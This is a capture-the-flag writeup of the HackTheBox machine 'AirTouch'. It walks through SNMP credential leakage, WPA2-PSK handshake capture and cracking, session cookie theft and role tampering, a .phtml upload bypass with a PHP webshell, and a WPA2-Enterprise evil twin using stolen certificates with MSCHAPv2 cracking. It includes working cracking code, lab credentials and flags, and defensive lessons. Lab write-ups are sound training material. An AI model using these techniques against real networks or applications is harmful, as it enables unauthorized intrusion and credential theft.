AirTouch — HackTheBox

Difficulty: Medium | OS: Linux (Ubuntu 20.04) | Release: January 2026
CVEs: None (wireless misconfiguration chain)
Author: jkonpc | February 27, 2026


Executive Summary

AirTouch is a medium-difficulty Linux machine that simulates a segmented corporate wireless environment across three VLANs. Exploitation chains through SNMP credential leakage, WPA2-PSK handshake capture and cracking, wireless traffic decryption for session hijacking, PHP upload filter bypass, legitimate certificate theft for a WPA2-Enterprise evil twin attack, and MSCHAPv2 hash cracking to pivot across all three network segments for full compromise.

Property          Value
Target IP         10.129.244.98
Open Ports        22/tcp (SSH), 161/udp (SNMP)
Network Segments  Consultant (172.20.1.0/24), Tablets (192.168.3.0/24), Corp (10.10.10.0/24)
User Flag         c85a8af90006711db25bfe7084ea368f
Root Flag         a99ebcc5f1d3ba156b64be95c0e4eeb9

Attack Chain Overview

  1. Initial Foothold (consultant): SNMP enumeration leaks SSH credentials → root via sudo NOPASSWD: ALL
  2. Tablet VLAN Access: WPA2-PSK handshake capture on AirTouch-Internet → aircrack-ng cracks PSK (challenge) → wireless association to 192.168.3.0/24
  3. Router Compromise (user): Wireless traffic decryption in Wireshark → session cookie theft → cookie manipulation for admin upload access → PHP extension filter bypass (.phtml) → webshell → credential recovery from login.php → SSH as user → user flag
  4. Corp VLAN Access (root): Certificate theft from gateway → EAPHammer evil twin with legitimate certs against AirTouch-Office → MSCHAPv2 hash capture → hashcat crack (r4ulcl:laboratory) → WPA2-Enterprise association to 10.10.10.0/24 → SSH as remote → hostapd credential recovery → su admin → sudo su → root flag

Phase 1: Reconnaissance

Service Enumeration

A standard TCP scan reveals a minimal attack surface — only SSH is externally accessible:

$ nmap -sC -sV -p- 10.129.244.98 -Pn

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The UDP Blind Spot

TCP-only scanning is a common pitfall. A targeted probe of 161/udp with onesixtyone (an SNMP community-string scanner) reveals SNMP answering to the default public community, with a credential leaked in the system description:

$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt 10.129.244.98

10.129.244.98 [public] "The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)"

Discovery        Detail
Hostname         AirTouch-Consultant
SSH Credentials  consultant:RxBlZhLmOkacNWScmZ6D
Source           SNMP sysDescr field via public community string

Phase 1: Exploitation — Establishing the Pivot Point

SSH Access & Local Privilege Escalation

The leaked credentials grant SSH access. The consultant user has unrestricted sudo privileges:

$ ssh consultant@10.129.244.98

consultant@AirTouch-Consultant:~$ sudo -l
User consultant may run the following commands on AirTouch-Consultant:
    (ALL) NOPASSWD: ALL

consultant@AirTouch-Consultant:~$ sudo su
root@AirTouch-Consultant:~#

Root on the Consultant box is not the objective — it is a prerequisite. Root privileges are required to manipulate wireless interfaces into monitor mode for the attacks ahead.

Network Topology

The home directory contains network diagrams (diagram-net.png) revealing a three-VLAN architecture behind a NAT router:

VLAN        Subnet          SSID               Gateway
Consultant  172.20.1.0/24   Wired (eth0)       172.20.1.1
Tablets     192.168.3.0/24  AirTouch-Internet  192.168.3.1
Corporate   10.10.10.0/24   AirTouch-Office    10.10.10.1

The machine exposes seven virtual wireless interfaces (wlan0 through wlan6) and has EAPHammer pre-installed in /root/eaphammer/, signaling that wireless attacks are the intended pivot mechanism.

Wireless Reconnaissance

Bringing up a wireless interface and scanning reveals the target networks:

# ip link set wlan0 up
# iw dev wlan0 scan

SSID               BSSID              Channel  Auth                 Band
AirTouch-Internet  f0:9f:c2:a3:f1:a7  1        802.1X (Enterprise)  2.4GHz
AirTouch-Internet  f0:9f:c2:a3:f1:a7  6        WPA2-PSK             2.4GHz
AirTouch-Office    ac:8b:a9:f3:a1:13  44       802.1X (Enterprise)  5GHz
AirTouch-Office    ac:8b:a9:aa:3f:d2  44       802.1X (Enterprise)  5GHz

The PSK instance of AirTouch-Internet on channel 6 is the entry point: once a 4-way handshake is captured, a WPA2-PSK passphrase can be attacked offline, and a weak one falls to a wordlist.


Phase 2: Breaching the Tablet VLAN (WPA2-PSK)

Handshake Capture

A monitor-mode interface is configured on channel 6 to capture the WPA2 4-way handshake:

# airmon-ng start wlan3
# iwconfig wlan3mon channel 6
# airodump-ng wlan3mon --channel 6 --bssid f0:9f:c2:a3:f1:a7 -w /tmp/handshake

A deauthentication attack on a separate interface forces the connected tablet client to reconnect, generating the handshake:

# airmon-ng start wlan5
# iwconfig wlan5mon channel 6
# aireplay-ng --ignore-negative-one -0 10 -a f0:9f:c2:a3:f1:a7 -c 28:6C:07:FE:A3:22 wlan5mon

Airodump confirms capture: [ WPA handshake: F0:9F:C2:A3:F1:A7 ]

Cracking the PSK

# aircrack-ng /tmp/handshake-01.cap -w /usr/share/wordlists/rockyou.txt

KEY FOUND! [ challenge ]

Credential  Value
SSID        AirTouch-Internet
PSK         challenge

Connecting to the Tablet VLAN

# wpa_passphrase "AirTouch-Internet" "challenge" > /tmp/wpa.conf
# wpa_supplicant -B -i wlan4 -c /tmp/wpa.conf
# dhclient wlan4
# ip a show wlan4
    inet 192.168.3.8/24

A host scan of the new subnet reveals the gateway:

# nmap -sn 192.168.3.0/24
# nmap -sCV 192.168.3.1

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1
53/tcp open  domain
80/tcp open  http    Apache/2.4.41 (Ubuntu)

Phase 3: Router Exploitation — Lateral Movement

Wireless Traffic Decryption

The router’s web interface at 192.168.3.1 requires credentials we don’t have. Since we possess the WPA2-PSK, we can decrypt captured wireless traffic to steal an authenticated session.

Using the airodump capture file (which must contain both the handshake and subsequent data frames), the traffic is decrypted in Wireshark:

Edit → Preferences → Protocols → IEEE 802.11 → Decryption Keys:

  • Key Type: wpa-psk
  • Key: the 64-hex-digit psk= value from the wpa_passphrase output (alternatively, key type wpa-pwd with challenge:AirTouch-Internet lets Wireshark derive it itself)
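The arithmetic behind this step and the cracking step above, as an added example that is not part of the original writeup: how the passphrase becomes the 64-hex-digit key Wireshark asks for (PBKDF2-HMAC-SHA1 with the SSID as salt, which is what wpa_passphrase prints), and how aircrack-ng decides a candidate is correct (expand the PMK into the PTK using the handshake's addresses and nonces, recompute the EAPOL-Key MIC with the KCK, compare). The handshake fed to crack_psk() is constructed here from the writeup's AP and client MACs, made-up nonces and the passphrase "challenge"; it is not the lab capture.

```python
import hashlib
import hmac
from typing import Iterable, Optional, Tuple


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    # This is the psk= hex value wpa_passphrase prints and the key Wireshark's
    # "wpa-psk" entry expects.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated.
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN)).
    # Its first 16 bytes are the KCK, the key that authenticates the handshake MIC.
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


# Offset of the 16-byte Key MIC inside an EAPOL-Key frame: 4-byte 802.1X header
# + type(1) + key info(2) + key length(2) + replay counter(8) + nonce(32) + IV(16)
# + RSC(8) + key ID(8) = 81.
EAPOL_MIC_OFFSET = 81


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # WPA2/CCMP (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC zeroed)[:16].
    zeroed = (eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16
              + eapol_frame[EAPOL_MIC_OFFSET + 16:])
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
              eapol_frame: bytes, wordlist: Iterable[str]) -> Optional[str]:
    # Offline dictionary attack: the candidate that reproduces the captured MIC is the PSK.
    captured = eapol_frame[EAPOL_MIC_OFFSET:EAPOL_MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured):
            return candidate
    return None


def sample_handshake() -> Tuple[str, bytes, bytes, bytes, bytes, bytes]:
    # Constructed message 2 of a 4-way handshake (not the lab capture): the AP and client
    # MACs are the ones in the writeup, the nonces are made up, and the MIC is computed
    # here with the passphrase "challenge" so crack_psk() has something real to verify.
    ssid = "AirTouch-Internet"
    ap_mac = bytes.fromhex("f09fc2a3f1a7")
    sta_mac = bytes.fromhex("286c07fea322")
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: MIC set, pairwise, version 2 (HMAC-SHA1)
            + b"\x00\x10"                # key length 16 (CCMP)
            + b"\x00" * 7 + b"\x01"      # replay counter 1
            + snonce                     # SNonce
            + b"\x00" * (16 + 8 + 8)     # key IV, RSC, key ID (zero in message 2)
            + b"\x00" * 16               # key MIC placeholder
            + b"\x00\x00")               # key data length 0
    frame = b"\x01\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v1, EAPOL-Key
    kck = derive_ptk(pmk_from_passphrase("challenge", ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    frame = frame[:EAPOL_MIC_OFFSET] + mic + frame[EAPOL_MIC_OFFSET + 16:]
    return ssid, ap_mac, sta_mac, anonce, snonce, frame


if __name__ == "__main__":
    print("psk for Wireshark:", pmk_from_passphrase("challenge", "AirTouch-Internet").hex())
    print("cracked:", crack_psk(*sample_handshake(), ["password", "laboratory", "challenge"]))
```

Two things the code makes visible: the PMK depends only on passphrase and SSID, so it can be precomputed per SSID, but the MIC check needs the per-client nonces, which is why Wireshark can only decrypt clients whose handshake it saw.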

Filtering on http reveals a tablet client’s requests to the router, including session cookies:

Cookie: PHPSESSID=8ufkslsjhr534hh9r3cgmf2cv4; UserRole=user

An SSH local port forward provides browser access to the router:

$ ssh -L 8081:192.168.3.1:80 consultant@10.129.244.98

Setting the stolen PHPSESSID cookie in the browser authenticates the session. The application also takes the role from the client-supplied UserRole cookie instead of from server-side session state, so changing it from user to admin in the browser console unlocks the administrative upload feature:

document.cookie = "UserRole=admin; path=/";

PHP Filter Bypass

The upload form rejects files with a .php extension and nothing else. On Ubuntu the default PHP module configuration hands every file matching .php, .phar or .phtml to the interpreter, so renaming the payload to .phtml passes the extension check and still executes:

<?php system($_GET['c']); ?>

The webshell is accessible at /uploads/shell.phtml and executes as www-data.
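Both weaknesses in this section, modelled as an added example (not the router's PHP): the role read from a client-controlled cookie beside a server-side session lookup, and the .php blacklist beside an allowlist, each checked against the file pattern Debian/Ubuntu's PHP module configuration hands to the interpreter. The session table, the mapping of the captured PHPSESSID to the manager account, and the allowed extensions are assumptions made for the example.

```python
import re
from pathlib import PurePosixPath
from typing import Dict, List

# Server-side session table as the router should hold it. Constructed for this example;
# that the captured PHPSESSID belongs to the manager account is an assumption.
SESSIONS: Dict[str, Dict[str, str]] = {
    "8ufkslsjhr534hh9r3cgmf2cv4": {"user": "manager", "role": "user"},
}


def role_trusting_cookie(cookies: Dict[str, str]) -> str:
    # Vulnerable pattern (what the router's behaviour indicates): the role comes from a
    # client-controlled cookie, so UserRole=admin typed into the console is honoured.
    return cookies.get("UserRole", "guest")


def role_from_session(cookies: Dict[str, str]) -> str:
    # Hardened: resolve the role server-side from the session ID; UserRole is ignored.
    session = SESSIONS.get(cookies.get("PHPSESSID", ""))
    return session["role"] if session else "guest"


# Debian/Ubuntu ship the PHP module with <FilesMatch ".+\.ph(ar|p|tml)$"> (case-sensitive),
# so every name matching this pattern is executed by PHP, not only *.php.
PHP_HANDLER_RE = re.compile(r".+\.ph(ar|p|tml)$")


def apache_executes_as_php(filename: str) -> bool:
    return PHP_HANDLER_RE.search(filename) is not None


def blacklist_filter_allows(filename: str) -> bool:
    # Vulnerable pattern: reject only the literal .php extension, as the upload form does.
    return not filename.lower().endswith(".php")


ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}  # assumed allowlist


def allowlist_filter_allows(filename: str) -> bool:
    # Hardened: no path components, no hidden files, exactly one extension, and that
    # extension must be on the allowlist. Anything else is rejected.
    name = PurePosixPath(filename).name
    if name != filename or name.startswith("."):
        return False
    parts = name.split(".")
    return len(parts) == 2 and "." + parts[1].lower() in ALLOWED_EXTENSIONS


def bypass_candidates(basename: str = "shell") -> List[str]:
    # Names that pass the blacklist yet are still executed by PHP under the default config.
    names = [f"{basename}.{ext}" for ext in ("phtml", "phar", "php5", "PHP")]
    return [n for n in names if blacklist_filter_allows(n) and apache_executes_as_php(n)]


if __name__ == "__main__":
    stolen = {"PHPSESSID": "8ufkslsjhr534hh9r3cgmf2cv4", "UserRole": "admin"}
    print("cookie-trusting role:", role_trusting_cookie(stolen))
    print("session-derived role:", role_from_session(stolen))
    print("blacklist bypasses:", bypass_candidates())
```

The allowlist version rejects .phtml and .phar because they are simply not on the list, and it never consults Apache's handler mapping, which is the point: a blacklist has to know every extension the server will execute, an allowlist does not.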

Credential Recovery

The webshell reveals hardcoded credentials in the login page source:

http://localhost:8081/uploads/shell.phtml?c=cat+/var/www/html/login.php

'admin'   => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),
'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user'),

User Flag

SSH access to the gateway as user with password admin (a separate local account, not the web credentials) provides the user flag:

$ ssh user@192.168.3.1

user@AirTouch-AP-PSK:~$ sudo -l
    (ALL) NOPASSWD: ALL

user@AirTouch-AP-PSK:~$ sudo cat /root/user.txt
c85a8af90006711db25bfe7084ea368f

Credential  Value
SSH User    user:admin
Web Admin   admin:JunDRDZKHDnpkpDDvay
User Flag   c85a8af90006711db25bfe7084ea368f

Phase 4: Evil Twin Attack (WPA2-Enterprise)

Certificate Theft

The gateway’s /root/ directory contains a certificate synchronization script and a backup of the RADIUS server’s TLS certificates:

user@AirTouch-AP-PSK:~$ sudo cat /root/send_certs.sh

REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

user@AirTouch-AP-PSK:~$ sudo ls /root/certs-backup/
ca.conf  ca.crt  server.conf  server.crt  server.csr  server.ext  server.key

These are the legitimate CA and server certificates used by the AirTouch-Office RADIUS server. With these, an evil twin AP will present a trusted certificate chain, causing enterprise clients to authenticate without warning.

The certificates are transferred to the Consultant box and imported into EAPHammer:

# ./eaphammer --cert-wizard import --server-cert ~/server.crt --ca-cert ~/ca.crt --private-key ~/server.key

Evil Twin Execution

EAPHammer is launched on a managed wireless interface, broadcasting AirTouch-Office on channel 44 with the stolen certificates:

# ip link set wlan6 up
# ./eaphammer --creds -i wlan6 -e "AirTouch-Office" -c 44 --auth wpa-eap

Deauthentication frames are sent from a monitor interface to disconnect clients from the real APs:

# airmon-ng start wlan2
# iwconfig wlan2mon channel 44
# aireplay-ng --deauth 10 -a ac:8b:a9:f3:a1:13 wlan2mon
# aireplay-ng --deauth 10 -a ac:8b:a9:aa:3f:d2 wlan2mon

Corporate clients reconnect to the rogue AP and perform PEAP-MSCHAPv2 authentication. EAPHammer captures the challenge/response:

mschapv2:
     domain\username:    AirTouch\r4ulcl
     username:           r4ulcl
     challenge:          60:fc:ec:b9:6b:5c:79:b3
     response:           37:5f:91:83:cc:80:5a:e9:9a:fd:66:57:14:ec:64:0d:a2:eb:ae:0a:1d:ae:5f:ae
     hashcat NETNTLM:    r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3

Cracking MSCHAPv2

$ hashcat -m 5500 r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3 /usr/share/wordlists/rockyou.txt

r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3:laboratory

Status: Cracked

A wordlist hit is convenient but not required: the 24-byte MSCHAPv2 response is three DES encryptions of the 8-byte challenge under pieces of the NT hash, so a captured pair can be attacked exhaustively through the 56-bit DES key space (the chapcrack technique) and yields the NT hash whatever the password's strength; a weak password only makes it instant.
Credential  Value
Username    r4ulcl
Domain      AirTouch
Password    laboratory
Source      MSCHAPv2 capture via evil twin
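An added example, not from the writeup or from EAPHammer's code, that rebuilds the hashcat line from EAPHammer's printed block and shows why the challenge in it is only 8 bytes: RFC 2759's ChallengeHash() collapses the two 16-byte wire challenges and the username into the 8 bytes the peer actually encrypts. The challenge values passed to mschapv2_challenge_hash() are made up; the DES step that turns the NT hash into the 24-byte response is deliberately not reimplemented here.

```python
import hashlib
import re

# The mschapv2 block EAPHammer printed above, copied from this writeup's capture.
SAMPLE_CAPTURE = r"""
mschapv2:
     domain\username:    AirTouch\r4ulcl
     username:           r4ulcl
     challenge:          60:fc:ec:b9:6b:5c:79:b3
     response:           37:5f:91:83:cc:80:5a:e9:9a:fd:66:57:14:ec:64:0d:a2:eb:ae:0a:1d:ae:5f:ae
     hashcat NETNTLM:    r4ulcl::::375f9183cc805ae99afd665714ec640da2ebae0a1dae5fae:60fcecb96b5c79b3
"""


def mschapv2_challenge_hash(peer_challenge: bytes, authenticator_challenge: bytes, username: str) -> bytes:
    # RFC 2759 section 8.2, ChallengeHash(): the 8 bytes the peer encrypts under its NT hash
    # are SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[:8]. EAPHammer prints
    # this derived value as "challenge", which is why it is 8 bytes and not 16.
    digest = hashlib.sha1(peer_challenge + authenticator_challenge + username.encode()).digest()
    return digest[:8]


def to_hashcat_5500(username: str, challenge: bytes, response: bytes) -> str:
    # hashcat -m 5500 (NetNTLMv1 / MSCHAPv2) takes user::domain:response:server_challenge.
    # For an MSCHAPv2 capture the domain and separate server challenge fields are left
    # empty, which produces the four consecutive colons seen in EAPHammer's output.
    if len(challenge) != 8 or len(response) != 24:
        raise ValueError("MSCHAPv2 needs an 8-byte challenge and a 24-byte response")
    return f"{username}::::{response.hex()}:{challenge.hex()}"


def parse_eaphammer_block(text: str) -> str:
    # Pull the "key:   value" fields out of EAPHammer's block and rebuild the hashcat line
    # from the raw challenge and response, so it can be checked against the one EAPHammer
    # itself emitted before hours of GPU time are spent on a mis-parsed hash.
    fields = dict(re.findall(r"^\s*([\w\\ ]+?):\s+(\S+)$", text, re.MULTILINE))
    challenge = bytes.fromhex(fields["challenge"].replace(":", ""))
    response = bytes.fromhex(fields["response"].replace(":", ""))
    return to_hashcat_5500(fields["username"], challenge, response)


if __name__ == "__main__":
    print(parse_eaphammer_block(SAMPLE_CAPTURE))
```

The username is part of the challenge hash, so a response captured for AirTouch\r4ulcl cannot be replayed or reused for another account even against the same authenticator challenge.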

Phase 5: Corporate VLAN — Root Compromise

WPA2-Enterprise Association

A wpa_supplicant configuration is created for PEAP authentication:

ctrl_interface=/var/run/wpa_supplicant
ap_scan=1
network={
    ssid="AirTouch-Office"
    scan_ssid=1
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\r4ulcl"
    password="laboratory"
    phase1="peapver=0"
    phase2="auth=MSCHAPV2"
}

# wpa_supplicant -B -i wlan6 -c /tmp/office.conf
# dhclient wlan6
# ip a show wlan6
    inet 10.10.10.10/24

Accessing the Management Host

The remote credentials from send_certs.sh provide SSH access to the Corp VLAN gateway:

$ ssh remote@10.10.10.1
Password: xGgWEwqUpfoOVsLeROeG

Credential Recovery from hostapd

Standard enumeration on the management host reveals hostapd running the enterprise RADIUS authentication. Inspecting running processes leads to the EAP user database:

remote@AirTouch-AP-MGT:~$ cat /etc/hostapd/hostapd_wpe.eap_user

"AirTouch\r4ulcl"   MSCHAPV2   "laboratory"  [2]
"admin"              MSCHAPV2   "xMJpzXt4D9ouMuL3JJsMriF7KZozm7"  [2]

Root Flag

remote@AirTouch-AP-MGT:~$ su admin
Password: xMJpzXt4D9ouMuL3JJsMriF7KZozm7

admin@AirTouch-AP-MGT:~$ sudo su

root@AirTouch-AP-MGT:~# cat /root/root.txt
a99ebcc5f1d3ba156b64be95c0e4eeb9

Root Flag: a99ebcc5f1d3ba156b64be95c0e4eeb9


Lessons Learned

SNMP as an Overlooked Attack Surface: The machine’s only TCP port was SSH, which would dead-end most testers who skip UDP enumeration. SNMP’s sysDescr field contained plaintext credentials — a realistic misconfiguration found frequently in enterprise network appliances and IoT devices. Penetration testers should always include UDP scanning (especially ports 161, 500, and 123) in their methodology.

WPA2-PSK Cracking Remains Trivial for Weak Passwords: The AirTouch-Internet PSK (challenge) was cracked from rockyou.txt in under a second. Organizations deploying WPA2-PSK should enforce minimum password length and complexity requirements, or migrate to WPA2-Enterprise for networks carrying sensitive traffic.

Wireless Traffic Decryption with Known PSK: Possessing the WPA2-PSK along with a client's captured 4-way handshake allows full decryption of that client's wireless traffic. The PSK alone is not enough: each client's pairwise key is derived from the nonces exchanged in its own handshake, which is why the deauthenticate-and-recapture step matters for every client of interest. This enabled session cookie theft without any active man-in-the-middle attack. Networks transmitting sensitive data over WiFi should enforce TLS at the application layer to protect against this class of passive interception.

Certificate Theft Enables Trusted Evil Twins: The initial evil twin attempt with self-signed certificates failed because enterprise clients validated the certificate chain. Only after recovering the legitimate CA and server certificates from the compromised gateway did the attack succeed. This highlights the importance of protecting RADIUS certificates and private keys — if an attacker obtains them, WPA2-Enterprise’s primary advantage over PSK (per-user authentication with mutual certificate validation) is neutralized.

Cleartext Credentials in Configuration Files: The attack chain recovered credentials from SNMP descriptions, PHP source code, shell scripts, and hostapd configuration files. Each credential enabled the next pivot. Secrets management, even in internal infrastructure, should avoid plaintext storage in favor of vaults, environment variables, or encrypted configuration.


Tools Used

Tool                 Purpose
nmap                 TCP/UDP service enumeration
onesixtyone          SNMP community string brute-force and enumeration
airmon-ng            Wireless interface monitor mode management
airodump-ng          Wireless traffic capture and handshake collection
aireplay-ng          Client deauthentication attacks
aircrack-ng          WPA2-PSK handshake cracking
wpa_supplicant       WPA2-PSK and WPA2-Enterprise network association
dhclient             DHCP IP address acquisition
Wireshark            Wireless traffic decryption and HTTP session analysis
EAPHammer            WPA2-Enterprise evil twin AP with credential capture
hashcat              MSCHAPv2 (NetNTLMv1) hash cracking
curl                 Web application interaction and enumeration
SSH port forwarding  Tunneling HTTP traffic to attacker browser

CVE Reference

CVE  Component                Description
N/A  SNMP Configuration       Plaintext credentials stored in sysDescr field, accessible via default public community string
N/A  AirTouch-Internet        Weak WPA2-PSK passphrase (challenge) crackable with standard wordlists
N/A  PSK Router (Apache/PHP)  File upload filter bypass via .phtml extension; hardcoded credentials in login.php; UserRole cookie-based authorization without server-side validation
N/A  AirTouch-AP-PSK Gateway  RADIUS CA certificate and private key stored in plaintext on gateway; cleartext credentials in send_certs.sh
N/A  AirTouch-AP-MGT          Cleartext user credentials in hostapd_wpe.eap_user configuration file

This post is licensed under CC BY 4.0 by the author.